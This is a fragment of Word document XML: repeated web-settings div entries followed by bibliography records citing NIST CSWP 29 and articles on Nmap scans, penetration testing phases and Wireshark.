        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="782579571">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="817381503">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="821704059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="867521277">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="883178404">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="898247978">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="901596949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="925191894">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="975255780">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1026098388">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1037392471">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1038090335">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1041436104">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1154225065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1236360488">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1301184360">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1301687665">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1302540088">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1328902346">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1340616742">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1364205923">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1400904187">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1407144250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1432776097">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1433433919">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1438789188">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1455637745">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1462109460">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1480918646">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1517577144">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1530757103">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1587492244">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1633100759">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1686594636">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1695424673">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1703744054">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1726564509">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1776170266">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1812792936">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1867325993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1867524671">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1895041227">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1895503655">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1922133553">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1948072837">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1986928144">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1989361016">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1999966220">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2021463503">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2083286610">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2089571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Nat241</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{DBA45D01-7E61-48DD-878A-BE6E9593A7E4}</b:Guid>
    <b:Title>NIST.CSWP.29</b:Title>
    <b:Year>2024</b:Year>
    <b:Month>February</b:Month>
    <b:Day>26</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.29.pdf</b:URL>
    <b:Author>
      <b:Author>
        <b:Corporate>National Institute of Standards and Technology</b:Corporate>
      </b:Author>
    </b:Author>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ver23</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{931AD0AE-D81B-46F3-83A7-0DB865D53688}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Muhungu</b:Last>
            <b:First>Verlaine</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.techtarget.com/searchnetworking/tip/Types-of-Nmap-scans-and-best-practices#:~:text=Nmap%20is%20a%20common%20tool%20used%20during%20the%20reconnaissance%20stage.&amp;text=Conducting%20a%20scan%20helps%20determine,opened%20ports%2C%20services%20and%</b:Title>
    <b:Year>2023</b:Year>
    <b:Month>August</b:Month>
    <b:Day>9</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.techtarget.com/searchnetworking/tip/Types-of-Nmap-scans-and-best-practices#:~:text=Nmap%20is%20a%20common%20tool%20used%20during%20the%20reconnaissance%20stage.&amp;text=Conducting%20a%20scan%20helps%20determine,opened%20ports%2C%20services%20and%</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ecc22</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{154A8705-42A8-451F-B890-A6EE7BF0E36B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>eccouncil</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Understanding the Five Phases of the Penetration Testing Process </b:Title>
    <b:Year>2022</b:Year>
    <b:Month>March</b:Month>
    <b:Day>28</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/penetration-testing-phases/</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sha23</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{1AC197D6-74D0-4316-8B8D-A7E9B024D4CC}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Alberts</b:Last>
            <b:First>ShanNeece</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Wireshark: A Powerful Tool for Cybersecurity Analysis</b:Title>
    <b:Year>2023</b:Year>
